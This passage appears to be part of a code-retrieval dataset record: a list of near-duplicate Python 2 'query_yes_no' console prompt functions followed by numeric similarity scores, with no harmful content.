\"n\":False}\r\n if default == None:\r\n prompt = \" [y/n] \"\r\n elif default == \"yes\":\r\n prompt = \" [Y/n] \"\r\n elif default == \"no\":\r\n prompt = \" [y/N] \"\r\n else:\r\n raise ValueError(\"invalid default answer: '%s'\" % default)\r\n\r\n while True:\r\n sys.stdout.write(question + prompt)\r\n choice = raw_input().lower()\r\n if default is not None and choice == '':\r\n return valid[default]\r\n elif choice in valid:\r\n return valid[choice]\r\n else:\r\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\r\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\r\n valid = {\"yes\":True, \"y\":True, \"ye\":True,\r\n \"no\":False, \"n\":False}\r\n if default == None:\r\n prompt = \" [y/n] \"\r\n elif default == \"yes\":\r\n prompt = \" [Y/n] \"\r\n elif default == \"no\":\r\n prompt = \" [y/N] \"\r\n else:\r\n raise ValueError(\"invalid default answer: '%s'\" % default)\r\n\r\n while True:\r\n sys.stdout.write(question + prompt)\r\n choice = raw_input().lower()\r\n if default is not None and choice == '':\r\n return valid[default]\r\n elif choice in valid:\r\n return valid[choice]\r\n else:\r\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\r\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = { \"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False }\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\":True, \"y\":True, \"ye\":True,\n \"no\":False, \"n\":False}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice 
== '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\":True, \"y\":True, \"ye\":True,\n \"no\":False, \"n\":False}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\":True, \"y\":True, \"ye\":True,\n \"no\":False, \"n\":False}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\":True, \"y\":True, \"ye\":True,\n \"no\":False, \"n\":False}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\":True, \"y\":True, \"ye\":True,\n \"no\":False, \"n\":False}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == 
\"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n 
else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \" \\\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\r\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\r\n \"no\": False, \"n\": False}\r\n if default is None:\r\n prompt = \" [y/n] \"\r\n elif default == \"yes\":\r\n prompt = \" [Y/n] \"\r\n elif default == \"no\":\r\n prompt = \" [y/N] \"\r\n else:\r\n raise ValueError(\"invalid default answer: '%s'\" % default)\r\n\r\n while True:\r\n sys.stdout.write(question + prompt)\r\n choice = raw_input().lower()\r\n if default is not None and choice == '':\r\n return valid[default]\r\n elif choice in valid:\r\n return valid[choice]\r\n else:\r\n sys.stdout.write(\"Please respond with 'yes' or 'no' (or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True, \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\n \"yes\": True,\n \"y\": True,\n \"ye\": True,\n \"no\": False,\n \"n\": False\n }\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] 
\"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' (or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n\tvalid = {\"yes\": True, \"y\": True, \"ye\": True,\n\t\t\t \"no\": False, \"n\": False}\n\tif default is None:\n\t\tprompt = \" [y/n] \"\n\telif default == \"yes\":\n\t\tprompt = \" [Y/n] \"\n\telif default == \"no\":\n\t\tprompt = \" [y/N] \"\n\telse:\n\t\traise ValueError(\"invalid default answer: '%s'\" % default)\n\n\twhile True:\n\t\tsys.stdout.write(question + prompt)\n\t\tchoice = raw_input().lower()\n\t\tif default is not None and choice == '':\n\t\t\treturn valid[default]\n\t\telif choice in valid:\n\t\t\treturn valid[choice]\n\t\telse:\n\t\t\tsys.stdout.write(\"Please respond with 'yes' or 'no' \"\n\t\t\t\t\t\t\t \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True, '1': True,\n \"no\": False, \"n\": False, '0': False, }\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")" ]
[ "0.82480913", "0.8201619", "0.8161579", "0.81534576", "0.81376886", "0.81355315", "0.81342065", "0.8133191", "0.8133191", "0.8130005", "0.8128684", "0.8128684", "0.8128684", "0.8128684", "0.8128684", "0.81278366", "0.81278366", "0.81278366", "0.81278366", "0.81278366", "0.81278366", "0.81278366", "0.81278366", "0.8127609", "0.8126707", "0.81220657", "0.81163895", "0.81112105", "0.81088907", "0.8103927" ]
0.85351175
0
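The negatives above are thirty near-duplicates of the same yes/no prompt helper, differing only in whitespace, line endings, or minor style, and all of them target Python 2 (raw_input). A minimal usage sketch of the shared contract, assuming a Python 3 port that swaps input for raw_input; everything else follows the variants verbatim:

import sys

def query_yes_no(question, default="yes"):
    # Map acceptable answers to booleans; mirrors the variants above.
    valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}
    prompts = {None: " [y/n] ", "yes": " [Y/n] ", "no": " [y/N] "}
    if default not in prompts:
        raise ValueError("invalid default answer: '%s'" % default)
    while True:
        sys.stdout.write(question + prompts[default])
        choice = input().lower()  # raw_input() in the Python 2 originals
        if default is not None and choice == '':
            return valid[default]
        if choice in valid:
            return valid[choice]
        sys.stdout.write("Please respond with 'yes' or 'no' (or 'y' or 'n').\n")

if __name__ == "__main__":
    if query_yes_no("Overwrite existing files?", default="no"):
        print("overwriting")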
Perform a filtered directory walk.
def filtered_walk(rootdir, filter_fn, include_dirs=None, exclude_dirs=None, get_dirs=False):
    flist = []
    dlist = []
    for root, dirs, files in os.walk(rootdir):
        if include_dirs and len(set(root.split(os.sep)).intersection(set(include_dirs))) == 0:
            ## Also try re.search in case we have patterns
            if re.search("|".join(include_dirs), root):
                pass
            else:
                continue
        if exclude_dirs and len(set(root.split(os.sep)).intersection(set(exclude_dirs))) > 0:
            continue
        if exclude_dirs and re.search("|".join(exclude_dirs), root):
            continue
        dlist = dlist + [os.path.join(root, x) for x in dirs]
        flist = flist + [os.path.join(root, x) for x in filter(filter_fn, files)]
    if get_dirs:
        return dlist
    else:
        return flist
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def filter(self):\n self._printer('Standard Walk')\n count = Counter(length=3)\n for directory in self.directory:\n self._printer('Searching ' + directory)\n for root, directories, files in os.walk(directory, topdown=self.topdown):\n root = root[len(str(directory)) + 1:]\n self._printer(str(count.up) + \": Explored path - \" + str(root), stream=True)\n if self.filters.validate(root):\n # Check that non-empty folders flag is on and we're at the max directory level\n if self.filters.non_empty_folders and self.filters.get_level(root) == self.filters.max_level:\n # Check that the path is not an empty folder\n if os.path.isdir(directory + os.sep + root):\n # Get paths in folder without walking directory\n paths = os.listdir(directory + os.sep + root)\n\n # Check that any of the paths are files and not just directories\n if paths and any(os.path.isfile(os.path.join(directory, p)) for p in paths):\n self.add_path(directory, root)\n\n else:\n for filename in files:\n fullname = os.path.join(root, filename)\n if self.filters.validate(fullname):\n # Join the two strings in order to form the full filepath.\n self.add_path(directory, fullname)", "def scan_directories(data_dir, file_filter):\n\n root = os.walk(data_dir)\n\n print('Scanning for files...')\n output = []\n\n for directory in root:\n\n files = directory[2]\n\n # Valid dataset contains video files of both halves and an accompanying label\n if file_filter(files):\n output.append(directory[0])\n\n print('Done')\n\n return output", "def walk(dirname): \n for name in os.listdir(dirname):\n path = os.path.join(dirname, name)\n if os.path.isfile(path):\n print(path)\n else:\n walk(path)", "def test_scan_dir_files(self):\n self.run_scan(self.subdir, self.nest_fcount + 1)", "def file_walker(root,**kwargs):\n\n # Get our keyword argunents, and do some initialization.\n max_depth=kwargs.get('depth',None)\n if max_depth==None:\n max_depth=sys.maxsize # I don't think we'll hit this limit in practice.\n follow_links=kwargs.get('follow_links',True)\n prune=compile_filename_patterns(kwargs.get('prune',[]))\n ignore=compile_filename_patterns(kwargs.get('ignore',[]))\n report_dirs=kwargs.get('report_dirs',False)\n if report_dirs not in (False,True,'first','last'):\n raise ValueError(\"report_dirs=%r is not one of False, True, 'first', or 'last'.\"%(report_dirs,))\n stack=[(0,root)] # Prime our stack with root (at depth 0).\n been_there=set([os.path.abspath(os.path.realpath(root))])\n dir_stack=[] # Stack of paths we're yielding after exhausting those directories.\n\n while stack:\n depth,path=stack.pop()\n if report_dirs in (True,'first'):\n yield path+os.sep\n elif report_dirs=='last':\n dir_stack.append(path+os.sep)\n flist=os.listdir(path)\n flist.sort()\n dlist=[]\n # First, let the caller iterate over these filenames.\n for fn in flist:\n p=os.path.join(path,fn)\n if os.path.isdir(p):\n # Just add this to this path's list of directories for now.\n dlist.insert(0,fn)\n continue\n pat,mat=first_match(fn,ignore)\n if not pat:\n yield p\n # Don't dig deeper than we've been told to.\n if depth<max_depth:\n # Now, let's deal with the directories we found.\n for fn in dlist:\n p=os.path.join(path,fn)\n # We might need to stack this path for our fake recursion.\n if os.path.islink(p) and not follow_links:\n # Nope. We're not following symlinks.\n continue\n rp=os.path.abspath(os.path.realpath(p))\n if rp in been_there:\n # Nope. We've already seen this path (and possibly processed it).\n continue\n m=None\n pat,mat=first_match(fn,prune)\n if pat:\n # Nope. 
This directory matches one of the prune patterns.\n continue\n # We have a keeper! Record the path and push it onto the stack.\n been_there.add(rp)\n stack.append((depth+1,p))\n while dir_stack:\n yield dir_stack.pop()", "def walk(dirname):\n for name in os.listdir(dirname):\n path = os.path.join(dirname, name)\n\n if os.path.isfile(path):\n print(path)\n else:\n walk(path)", "def __walk_tree(self):\n for root, dirnames, files in os.walk(self.path, topdown=True):\n self.dirCount += 1\n # Create a tuple with the file size, the file name and the files inode (for tracking hard links).\n files = [\n (os.lstat(os.path.join(root, fi)).st_size, os.path.join(root, fi), os.lstat(os.path.join(root, fi)).st_ino) for fi\n in files if (os.lstat(os.path.join(root, fi)).st_size > self.size)]\n self.fileList.extend(files)\n if len(self.excludeList) > 0:\n dirnames[:] = [dir for dir in dirnames if dir not in self.excludeList]\n if not self.cross_mount_points:\n dirnames[:] = [dir for dir in dirnames if not os.path.ismount(os.path.join(root, dir))]", "def filtered_walk(\n path: str,\n include: Optional[List[str]] = None,\n exclude: Optional[List[str]] = None\n) -> Iterator[str]:\n exclude = exclude or []\n\n if not isdir(path):\n raise ValueError(\"Cannot walk files, only directories: {}\".format(path))\n\n files = os.listdir(path)\n for name in files:\n filename = normpath(join(path, name))\n\n # If excluded, completely skip it. Will not recurse into directories\n if search_globs(filename, exclude):\n continue\n\n # If we have a whitelist and the pattern matches, yield it. If the\n # pattern didn't match and it's a dir, it will still be recursively\n # processed.\n if not include or match_globs(filename, include):\n yield filename\n\n if isdir(filename):\n for p in filtered_walk(filename, include, exclude):\n yield p", "def walk(dir, op=None):\n files = os.listdir(dir)\n for afile in files:\n path = os.path.join(dir, afile)\n if os.path.isdir(path):\n walk(path, op)\n elif os.path.isfile(path) and isJsFile(path):\n if op:\n op(path)\n else:\n print \"dir: %s, file: %s\" % (dir, path)", "def walk(tgt_dir,meth):\n tgt_dir = os.path.abspath(tgt_dir)\n for fname in [fname for fname in os.listdir(tgt_dir) if not fname in [\".\",\"..\"]]:\n nfile = os.path.join(tgt_dir,fname)\n meth(nfile)\n if os.path.isdir(nfile):\n walk(nfile,meth)", "def walk(self):\n if os.path.exists(self.folder):\n for root_path, _, f_files in os.walk(self.folder):\n yield root_path, f_files\n if not self.recursive:\n break\n else:\n print(f\"[!e] Passed folder doesn't exist. 
Path: {self.folder}\",\n file=sys.stdout)\n exit(0)", "def walk(dir, callback):\n\n dir = abspath(dir)\n for file in listdir(dir):\n nfile = join(dir, file)\n if isdir(nfile):\n walk(nfile, callback)\n else:\n callback(nfile)", "def walk(self): # DirObj.walk\n for name, subdir in self.subdirs.iteritems():\n for e in subdir.walk():\n yield e\n for name, fileEntry in self.files.iteritems():\n yield fileEntry\n yield self", "def dirwalk(self, topdown=False): # DirObj.dirwalk\n if topdown:\n yield self\n\n for name, d in self.subdirs.iteritems():\n for dirEntry in d.dirwalk():\n yield dirEntry\n\n if not topdown:\n yield self", "def analyze_dir(self, dirname):\n if self.exceeded_max():\n return\n\n for (dirpath, dirnames, filenames) in os.walk(dir_name):\n for filename in filenames:\n self.analyze_file(dirname + \"/\" + filename)", "def walk(self):\n if self.parallelize:\n self.filepaths = Sprinter(self.directory, self.filters, self.full_paths, self.pool_size,\n self._printer).sprinter()\n else:\n self.filepaths = Crawler(self.directory, self.filters, self.full_paths, self.topdown,\n self._printer).crawler()\n return self._get_filepaths()", "def _WalkFolders(self, folder_dict, parent):\n entries = folder_dict.keys()\n entries.sort()\n for e in entries:\n if folder_dict[e]:\n # Folder\n n_subfolder = self.doc.createElement('Filter')\n n_subfolder.setAttribute('Name', e)\n parent.appendChild(n_subfolder)\n self._WalkFolders(folder_dict[e], n_subfolder)\n else:\n # File\n n_file = self.doc.createElement('File')\n n_file.setAttribute('RelativePath', e)\n parent.appendChild(n_file)", "def getImmediateSubdirectories(dir):", "def directoryModifiedHandler(ob, event):\n query = dict(object_provides=IEntry.__identifier__)\n for l in ob.restrictedTraverse('@@folderListing')(**query):\n l.getObject().reindexObject(idxs=[\"pdir_keywords\"])", "def dirwalk(a_dir, a_wildcards= '*'):\n\n #iterate over files in the current dir\n for the_file in fnmatch.filter(sorted(os.listdir(a_dir)), a_wildcards):\n fullpath = os.path.join(a_dir, the_file)\n if not os.path.isdir(fullpath):\n yield fullpath\n \n sub_dirs = os.walk(a_dir).next()[1]\n #iterate over sub_dirs\n for sub_dir in sub_dirs:\n fullpath = os.path.join(a_dir, sub_dir)\n for p_elem in dirwalk(fullpath, a_wildcards):\n yield p_elem", "def walk_dir(self, dir):\n if self.ppath_prefix_len:\n prefix = self.ppath_prefix[self.ppath_prefix_idx%self.ppath_prefix_len]\n self.ppath_prefix_idx += 1\n merged_path = os.path.join(prefix, dir)\n for root, dirs, files in self.fswalk_base(merged_path):\n yield merged_path, dirs, files\n else:\n yield self.fswalk_base(dir)", "def walk(root_path, type_filter=None, pattern=None, return_basename=False):\n # Sanity check\n if not os.path.exists(root_path):\n raise FileNotFoundError('!! 
`{}` not exist'.format(root_path))\n paths = [os.path.join(root_path, p) for p in os.listdir(root_path)]\n # Filter path\n if type_filter in ('file',): type_filter = os.path.isfile\n elif type_filter in ('folder', 'dir'): type_filter = os.path.isdir\n else: assert type_filter is None\n if callable(type_filter): paths = list(filter(type_filter, paths))\n # Filter pattern\n if pattern is not None:\n paths = list(filter(lambda p: fnmatch(p, pattern), paths))\n if return_basename: return [os.path.basename(p) for p in paths]\n return paths", "def _recursive_scan(directory=None, file_extension='.dvl'):\n directory = directory or app.config['DEVICE_LOG_DRIVE']\n\n for entry in os.scandir(directory):\n if entry.is_dir(follow_symlinks=False):\n yield from _recursive_scan(entry)\n elif os.path.splitext(entry.name)[1] == file_extension:\n yield entry", "def walk( root, depth=None, include=None, exclude=None, callback=None ):\n\tfiles = []\n\tstack = [ root, ]\n\tif callback is None:\n\t\tcallback = lambda x:files.append(x)\n\twhile stack and ( not depth or len(stack) <= depth ):\n\t\td = stack.pop()\n\t\tsubs = []\n\t\tfor e in listdir( d ):\n\t\t\tc = join( d, e )\n\t\t\tif isdir( c ):\n\t\t\t\tsubs.append( c )\n\t\t\telif ((not include) or match( include, c)) \\\n\t\t\t\t and ((not exclude) or not match( exclude, c)):\n\t\t\t\tcallback( c )\n\t\tstack.extend( subs )\n\treturn files", "def scan ( self, **kw ):\n stats = self.STATS\n stats.scan_time.begin ( self.name )\n for subdir in os.listdir ( self.physical_location ):\n if self.has_dir ( subdir ):\n pkgdir = self._get_package_dir ( subdir )\n try:\n pkgdir.scan ( stats=stats, **kw )\n finally:\n if pkgdir.empty():\n del self._subdirs [subdir]\n\n stats.scan_time.end ( self.name )", "def directory_walker(start_dir):\n\n for root, dirs, files in os.walk(os.path.expanduser(start_dir)):\n for f in files:\n filename = os.path.join(root, f)\n # Only process if its a type of image\n file_type = mimetypes.guess_type(filename.lower())[0]\n if file_type is not None and file_type.startswith('image/'):\n yield filename", "def list_and_filter(self, pattern, root_path):\n for path, dirs, files in os.walk(os.path.abspath(root_path)):\n for filename in fnmatch.filter(files, pattern):\n yield os.path.join(path, filename)", "def iter_dir_tree(top, nohidden=True, pattern=\".*\"):\n for root, dirs, files in os.walk(top):\n if nohidden:\n remove_hidden_files(dirs)\n remove_hidden_files(files)\n for f in files:\n if re.match(pattern, f):\n yield os.path.join(root, f)", "def process_directory(dir, exiftool_path):\n for path_object in pathlib.Path(dir).glob(\"**/*\"):\n if path_object.is_file():\n verbose(f\"Processing file {path_object}\")\n process_file(path_object, exiftool_path)\n elif path_object.is_dir():\n verbose(f\"Processing directory {path_object}\")\n process_directory(path_object, exiftool_path)", "def dir_filter(x):\n return os.path.isdir('logs/{}'.format(x))" ]
[ "0.7196122", "0.6588966", "0.6396584", "0.6380269", "0.6349008", "0.63149124", "0.61969244", "0.61103547", "0.60762525", "0.6074421", "0.60585856", "0.6046986", "0.60449713", "0.6044598", "0.60307413", "0.6027791", "0.60122037", "0.599719", "0.5978354", "0.5976603", "0.5976579", "0.5921626", "0.5893457", "0.5890631", "0.5869465", "0.58645713", "0.5847061", "0.58361703", "0.58346146", "0.5819341" ]
0.6661728
1
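A short usage sketch for the filtered_walk document above. The function assumes os and re are imported at module level; the directory name, extension, and exclude pattern here are hypothetical illustration values:

import os
import re

# Collect .fastq files under ./data, skipping any directory whose path
# matches 'tmp'; pass get_dirs=True to collect directories instead.
fastqs = filtered_walk("data",
                       filter_fn=lambda fn: fn.endswith(".fastq"),
                       exclude_dirs=["tmp"])
for path in fastqs:
    print(path)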
Transform option list to a dictionary.
def opt_to_dict(opts):
    if isinstance(opts, dict):
        # Already a dictionary; nothing to transform.
        return opts
    args = list(itertools.chain.from_iterable([x.split("=") for x in opts]))
    opt_d = {k: True if v.startswith('-') else v for k, v in zip(args, args[1:] + ["--"]) if k.startswith('-')}
    return opt_d
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse_options(option_list: List[str]) -> Dict[str, Union[int, float, str]]:\n d = dict()\n for o in option_list:\n o = o.split('=')\n if len(o) != 3:\n raise OptionParsingError(\"Not enough elements in the parsed options. Need 3 elements.\")\n key = o[0]\n val = o[1]\n if o[2] not in type_mappings:\n raise OptionParsingError(f\"Unknown option type {o[2]}.\")\n type_func = type_mappings[o[2]]\n d.update({key: type_func(val)})\n return d", "def to_string_dict(self):\n ret_val = {}\n for section in self.parser.sections():\n for option in self.parser.options(section):\n sect = ret_val.get(section, {})\n sect[option] = self.parser.get(section, option)\n ret_val[section] = sect\n return ret_val", "def _fields_list_to_dict(fields, option_name):\n if isinstance(fields, abc.Mapping):\n return fields\n\n if isinstance(fields, (abc.Sequence, abc.Set)):\n if not all(isinstance(field, str) for field in fields):\n raise TypeError(\"%s must be a list of key names, each an \"\n \"instance of %s\" % (option_name,\n str.__name__))\n return dict.fromkeys(fields, 1)\n\n raise TypeError(\"%s must be a mapping or \"\n \"list of key names\" % (option_name,))", "def _to_dict(self, data_list):\n data_dict = dict(pair.split('=') for pair in data_list)\n return data_dict", "def _get_options_map(options: List[bs4.element.Tag]) -> OrderedDict:\n mapping = OrderedDict()\n for option in options:\n value, label = option[\"value\"], option.string\n if not value or value == \"0\" or not label:\n continue\n mapping[value] = label\n return mapping", "def getOptionsDict(self, section):\n answer = {}\n for option in self.getOptions(section):\n answer[option] = self.get(section, option)\n return answer", "def tcp_opts_tuple_list_to_dict(opts_list: list) -> dict:\n opts = {}\n if None in opts_list:\n opts_list.remove(None)\n for opt, value in opts_list:\n 